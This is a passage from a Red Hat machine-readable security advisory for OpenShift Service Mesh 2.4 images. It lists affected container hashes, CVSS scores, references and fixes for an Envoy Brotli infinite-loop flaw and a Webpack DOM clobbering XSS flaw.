"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-32976"
},
{
"category": "external",
"summary": "RHBZ#2283145",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2283145"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-32976",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-32976"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-32976",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-32976"
},
{
"category": "external",
"summary": "https://github.com/envoyproxy/envoy/security/advisories/GHSA-7wp5-c2vq-4f8m",
"url": "https://github.com/envoyproxy/envoy/security/advisories/GHSA-7wp5-c2vq-4f8m"
}
],
"release_date": "2024-06-04T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T09:22:37+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7724"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "envoy: Brotli decompressor infinite loop"
},
{
"cve": "CVE-2024-43788",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-08-27T17:20:06.890123+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2308193"
}
],
"notes": [
{
"category": "description",
"text": "A DOM Clobbering vulnerability was found in Webpack via `AutoPublicPathRuntimeModule`. DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script through seemingly benign HTML markups in the webpage, for example, through a post or comment, and leverages the gadgets (pieces of JS code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to Cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or ID attributes.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The severity of this issue is classified as moderate rather than important due to the specific conditions required for exploitation. DOM Clobbering, while serious, can only be leveraged in environments where an attacker has the ability to inject unsanitized HTML attributes (e.g., `name` or `id`) into a web page. This limits the attack surface to applications that improperly sanitize user input and rely on Webpack-generated files. Furthermore, the exploitation depends on existing vulnerabilities in the sanitization process, rather than the direct execution of arbitrary scripts. As a result, while the issue can lead to XSS, its impact is constrained by the contextual requirement of HTML injection, lowering its overall severity compared to more direct XSS vectors.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43788"
},
{
"category": "external",
"summary": "RHBZ#2308193",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308193"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43788",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43788"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43788",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43788"
},
{
"category": "external",
"summary": "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61",
"url": "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61"
},
{
"category": "external",
"summary": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986",
"url": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986"
},
{
"category": "external",
"summary": "https://research.securitum.com/xss-in-amp4email-dom-clobbering",
"url": "https://research.securitum.com/xss-in-amp4email-dom-clobbering"
},
{
"category": "external",
"summary": "https://scnps.co/papers/sp23_domclob.pdf",
"url": "https://scnps.co/papers/sp23_domclob.pdf"
}
],
"release_date": "2024-08-27T17:15:07.967000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T09:22:37+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7724"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le",
